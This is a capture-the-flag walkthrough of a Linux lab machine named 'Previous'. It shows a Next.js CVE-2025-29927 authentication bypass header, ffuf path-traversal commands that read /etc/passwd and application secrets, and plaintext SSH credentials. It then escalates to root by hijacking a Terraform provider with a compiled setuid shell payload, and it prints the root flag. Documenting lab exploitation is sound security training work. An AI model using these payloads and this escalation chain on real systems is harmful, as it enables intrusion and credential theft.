⏮️ Previous

September 6, 2025
Linux
8 hours
Medium
Next.js CVE-2025-29927 Middleware Bypass LFI Terraform sudo Provider Override
User

🔧 Initial Setup

First, I added the target to my hosts file for proper DNS resolution:

echo "10.10.11.83 previous.htb" | sudo tee -a /etc/hosts

🔍 Nmap Enumeration

Starting with a comprehensive port scan to identify running services:

nmap -Pn -A 10.10.11.83

Key findings from the scan:

  • Port 22 (SSH) – OpenSSH 8.9p1 on Ubuntu, potential entry point for later access
  • Port 80 (HTTP) – nginx 1.18.0, redirects to previous.htb

The target appears to be running Ubuntu Linux with a standard web server configuration.

🌐 Web Application Analysis

Accessing http://10.10.11.83 automatically redirects to previous.htb, revealing a modern web application.

Previous.htb homepage showing a modern web interface

Examining the source code revealed an interesting credential in the HTML comments:

HTML source code revealing jeremy@previous.htb email address
Discovery: Found potential username jeremy@previous.htb in the application source

When clicking "Get Started" or "Docs", the application redirects to a login page, indicating authentication is required for accessing protected content.

Login page showing authentication requirement

🔧 Technology Stack Identification

Using browser developer tools and Wappalyzer, I identified the technology stack:

Wappalyzer results showing Next.js 15.2.2 and nginx versions
Critical Finding: The application runs Next.js 15.2.2, which is vulnerable to CVE-2025-29927 - an authentication bypass via middleware manipulation

This vulnerability allows bypassing authentication middleware by sending a crafted x-middleware-subrequest header, making it a prime attack vector.

⚡ CVE-2025-29927 - Next.js Middleware Bypass

With Next.js 15.2.2 confirmed, I tested the authentication bypass vulnerability manually using Burp Suite.

The attack process:

  1. Intercept a request to a protected route like /docs or /get-started
  2. Observe the baseline response: 307 redirect to /login
  3. Add the crafted header to bypass middleware authentication

Without the bypass header, requests return a 307 redirect:

Burp Suite showing 307 redirect to login page

Adding the exploit header successfully bypasses authentication:

X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
Successful bypass showing 200 OK response with content
Exploitation Success: The middleware bypass works! Status changed from 307 to 200 OK, and we can access protected content.

📂 Route Discovery via Build Manifest

Analyzing the bypassed response revealed references to JavaScript files, including _buildManifest.js which contains route mappings.

Key routes discovered from the build manifest:

  • /docs
  • /docs/components/layout
  • /docs/components/sidebar
  • /docs/content/examples
  • /docs/content/getting-started

The /docs/content/examples route appeared particularly interesting for further exploration.

Examples page showing downloadable content with file parameter

🔓 Local File Inclusion (LFI) Discovery

While exploring /docs/content/examples, I discovered a download feature that accepts file parameters:

GET /api/download?example=hello-world.ts HTTP/1.1

The example parameter directly fetches files from the server, making it a potential Local File Inclusion (LFI) target.

🎯 LFI Exploitation with ffuf

I used ffuf to automate LFI testing with common Linux file paths:

ffuf -u "http://previous.htb/api/download?example=../../../../../../FUZZ" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt \
  -mr "root:x"
ffuf results showing successful LFI discovery
LFI Confirmed: Successfully retrieved /etc/passwd content, confirming the vulnerability
Contents of /etc/passwd showing user jeremy

The passwd file revealed the jeremy user we discovered earlier, confirming our enumeration was accurate.

🔍 Next.js Configuration Extraction

Understanding Next.js application structure, I targeted configuration files that might contain sensitive information.

Key file retrieved: .env.local containing environment variables:

Environment file showing NEXTAUTH_SECRET

While I discovered the NEXTAUTH_SECRET, attempts to forge valid JWT tokens were unsuccessful as the server returned empty responses.

📁 Build Manifest Analysis

I accessed the build manifest to understand the application's route structure:

GET /api/download?example=../../_next/static/{buildId}/_buildManifest.js
Build manifest showing dynamic routes including NextAuth

The manifest revealed a critical dynamic route:

"dynamicRoutes": [
  {
    "page": "/api/auth/[...nextauth]",
    "regex": "^/api/auth/(.+?)(?:/)?$"
  }
]

🔑 Credential Discovery in NextAuth Module

Targeting the NextAuth configuration file for credential extraction:

GET /api/download?example=../../.next/server/pages/api/auth/[...nextauth].js
NextAuth configuration file revealing jeremy's credentials
Credentials Found: jeremy@previous.htb:MyNameIsJeremyAndILovePancakes

The NextAuth configuration contained hardcoded credentials for the jeremy user, providing our path to system access.

🔐 SSH Access as Jeremy

Using the extracted credentials to establish SSH access:

ssh jeremy@previous.htb

Authentication successful! I now have shell access as the jeremy user.

Successful SSH login and user flag capture
User Flag: Successfully captured user.txt from jeremy's home directory
Root

🔍 Privilege Escalation Enumeration

Checking sudo privileges for potential escalation paths:

sudo -l

Output revealed an interesting sudo permission:

User jeremy may run the following commands on previous:
    (root) /usr/bin/terraform -chdir=/opt/examples apply
Privilege Escalation Vector: Jeremy can run Terraform as root, but only with the specific -chdir=/opt/examples parameter

🏗️ Understanding Terraform Configuration

Terraform is an Infrastructure as Code tool that uses providers and modules to manage resources. The key insight is that Terraform can load and execute custom provider plugins.

Terraform logo and explanation

Examining the Terraform configuration in jeremy's home directory:

Contents of .terraformrc file showing provider overrides

The .terraformrc file contains a critical misconfiguration:

provider_installation {
    dev_overrides {
        "previous.htb/terraform/examples" = "/usr/local/go/bin"
    }
    direct {}
}

This configuration uses dev_overrides to redirect the provider previous.htb/terraform/examples to load from a local path instead of downloading from a registry.

⚡ Terraform Provider Override Exploitation

The exploitation strategy involves:

  1. Creating a malicious binary to replace the Terraform provider
  2. Modifying the .terraformrc to point to a writable directory
  3. Triggering Terraform apply with sudo to execute our payload as root

First, I modified the .terraformrc file to point to /tmp (a writable directory):

Modified .terraformrc pointing to /tmp directory

🔨 Creating the Privilege Escalation Payload

I created a simple C program to spawn a root shell:

// exploit.c
#include 
int main() {
    setuid(0); setgid(0);
    execl("/bin/bash","bash","-p",NULL);
}

Compiled the exploit directly to the expected provider path:

gcc /home/jeremy/exploit.c -o /tmp/terraform-provider-examples
chmod +x /tmp/terraform-provider-examples

🚀 Triggering the Exploitation

With the malicious provider in place, I executed the sudo command:

sudo /usr/bin/terraform -chdir=/opt/examples apply

When Terraform runs, it attempts to load the examples provider from our overridden path. Since we control that path, our malicious binary executes with root privileges.

Successful root shell acquisition showing id command output

Running our elevated bash shell:

./bash -p
Root Access Achieved:
uid=1000(jeremy) gid=1000(jeremy) euid=0(root) egid=0(root)
Root Flag: 97a6e03d8af5dda6ffe6d8079bb199a2

🎯 Attack Chain Summary

This machine demonstrated a complete web application to root compromise through modern framework vulnerabilities and infrastructure misconfigurations:

Web Reconnaissance 
    → Next.js Version Identification (15.2.2)
    → CVE-2025-29927 Middleware Bypass
    → Protected Route Access
    → Local File Inclusion Discovery
    → NextAuth Configuration Extraction
    → SSH Credentials (jeremy)
    → Terraform sudo Privileges
    → Provider Override Misconfiguration
    → Root Shell Execution

Key Techniques Demonstrated

  • Framework Vulnerability Exploitation: CVE-2025-29927 Next.js middleware bypass
  • Local File Inclusion: Extracting sensitive configuration files through path traversal
  • Configuration File Analysis: Understanding Next.js application structure for targeted file extraction
  • Credential Discovery: Finding hardcoded credentials in application configuration
  • Infrastructure as Code Exploitation: Terraform provider override abuse for privilege escalation
  • sudo Misconfiguration: Leveraging specific command permissions for root access

Tools and Technologies Used

  • Nmap: Network reconnaissance and service enumeration
  • Burp Suite: Web application testing and request manipulation
  • ffuf: Directory and file fuzzing for LFI discovery
  • Next.js: Understanding framework structure and vulnerabilities
  • Terraform: Infrastructure as Code exploitation and provider manipulation
  • GCC: Compiling custom privilege escalation payloads
Defensive Recommendations: Regular framework updates, secure configuration management, proper input validation, and restricted sudo permissions can prevent these attack vectors. Additionally, using signed providers and avoiding dev_overrides in production environments is critical for Terraform security.
Back to Home Next Writeup